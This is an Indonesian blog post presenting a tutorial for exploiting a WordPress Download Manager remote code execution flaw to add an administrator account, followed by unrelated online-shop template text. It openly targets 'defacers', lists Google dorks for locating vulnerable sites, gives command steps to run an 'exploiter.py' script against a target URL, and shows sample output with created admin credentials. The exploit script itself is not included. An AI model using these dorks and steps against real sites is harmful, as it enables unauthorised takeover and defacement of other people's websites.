Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)
Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)

Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)

 
Naufal Ardhani - Halo gaes dah lama ga update artikel nihh kali ini saya bakal bagiin Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin), Cocok banget buat Defacer yang suka deface CMS Wordpress Exploit ini cukup mudah tapi cari targetnya yang males karna saya gasuka dorking -_- jadi ditutorial ini gapake livetarget dulu.


Sebelumnya bagi anda yang belum tau apa itu Remote Code Execution simak sedikit penjelasan dibawah,
Remote Code Execution (RCE) adalah bug yg memungkinkan attacker untuk menjalankan command2 secara remote melalui url. Bug ini biasanya terdapat pada aplikasi yg mnggunakan cgi.  ( Sumber : FACEBOOK )

Bahan :

 Dork :
  • index of "download-manager"
  • index of "download-manager" inurl:/wp
  • index of "download-manager" inurl:/wordpress/

Step :

  1. Buka Terminal anda
  2. Open ke Directory dimana anda menyimpan Exploiternya ( kalau saya di Documents/doc/tools ) jadi commandnya : cd Documents/doc/tools/
  3. Sudah ketemu exploiter.py nya lalu jalankan dengan command : python exploiter.py
  4.  Jika sudah mendapatkan taget langsung saja eksekusi dengan command : python exploiter.py -t http://www.site-target.com
SEKEDAR GAMBARAN JIKA BERHASIL
[!] Account Added
[!] Location: http://10.0.0.67/wordpress/wp-login.php
[!] Username: r7Uo4v
[!] Password: YN1G1F

Sekian Artikel Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)
Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)

Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin)

Pesan via WhatsApp! - Proses Pemesanan Mudah ( via WhatsApp ) Instan checkout, tanpa registrasi / login.

Pesan via WhatsApp!

Proses Pemesanan Mudah ( via WhatsApp ) Instan checkout, tanpa registrasi / login.

Pengiriman Fleksibel - Kami menyediakan Layanan Pesan - Ambil ( Pickup ) & Pesan - Antar ( Delivery )

Pengiriman Fleksibel

Kami menyediakan Layanan Pesan - Ambil ( Pickup ) & Pesan - Antar ( Delivery )

Metode Pembayaran Lengkap - Bayar via Bank Transfer, E-Wallet atau PayPal? Bisa banget!

Metode Pembayaran Lengkap

Bayar via Bank Transfer, E-Wallet atau PayPal? Bisa banget!

Toko WA+

Template Blogger dengan fitur Toko Online berbasis WhatsApp + Keranjang Pesanan yang berguna untuk membantu "Pebisnis Online" menjual Produk maupun Jasa secara Instan & Efisien.

Hubungi Kami

Jl. Alamat Toko, No. 123 - Bandung 40241
Phone / WhatsApp. +62 89618885066
E-mail. info@website.com

Exploit WordPress Download Manager Remote Code Execution Vulnerability (Wordpress Add Admin) http://filingjoingly.blogspot.com/2018/12/exploit-wordpress-download-manager.html
( 0 ) 0